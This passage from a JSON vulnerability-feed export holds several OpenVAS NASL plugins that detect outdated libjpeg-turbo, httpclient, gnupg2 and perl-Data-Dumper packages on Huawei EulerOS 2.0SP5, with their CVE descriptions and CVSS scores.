exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo\", rpm:\"libjpeg-turbo~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo-devel\", rpm:\"libjpeg-turbo-devel~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:47:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201109", "title": "Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1109\");\n script_version(\"2020-02-24T09:05:08+0000\");\n script_cve_id(\"CVE-2015-5262\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1109\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1109\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'jakarta-commons-httpclient' package(s) announced via the EulerOS-SA-2020-1109 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.(CVE-2015-5262)\");\n\n script_tag(name:\"affected\", value:\"'jakarta-commons-httpclient' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-httpclient\", rpm:\"jakarta-commons-httpclient~3.1~16.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:48:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201104", "title": "Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1104\");\n script_version(\"2020-02-24T09:05:03+0000\");\n script_cve_id(\"CVE-2015-1606\", \"CVE-2015-1607\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1104\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1104\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'gnupg2' package(s) announced via the EulerOS-SA-2020-1104 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x before 2.0.27, and 2.1.x before 2.1.2 does not properly handle bitwise left-shifts, which allows remote attackers to cause a denial of service (invalid read operation) via a crafted keyring file, related to sign extensions and 'memcpy with overlapping ranges.'(CVE-2015-1607)\n\nThe keyring DB in GnuPG before 2.1.2 does not properly handle invalid packets, which allows remote attackers to cause a denial of service (invalid read and use-after-free) via a crafted keyring file.(CVE-2015-1606)\");\n\n script_tag(name:\"affected\", value:\"'gnupg2' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"gnupg2\", rpm:\"gnupg2~2.0.22~5.h2.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:44:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201123", "title": "Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1123\");\n script_version(\"2020-02-24T09:06:58+0000\");\n script_cve_id(\"CVE-2014-4330\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1123\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1123\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'perl-Data-Dumper' package(s) announced via the EulerOS-SA-2020-1123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Dumper method in Data::Dumper before 2.154, as used in Perl 5.20.1 and earlier, allows context-dependent attackers to cause a denial of service (stack consumption and crash) via an Array-Reference with many nested Array-References, which triggers a large number of recursive calls to the DD_dump function.(CVE-2014-4330)\");\n\n script_tag(name:\"affected\", value:\"'perl-Data-Dumper' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Data-Dumper\", rpm:\"perl-Data-Dumper~2.145~3.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}]}
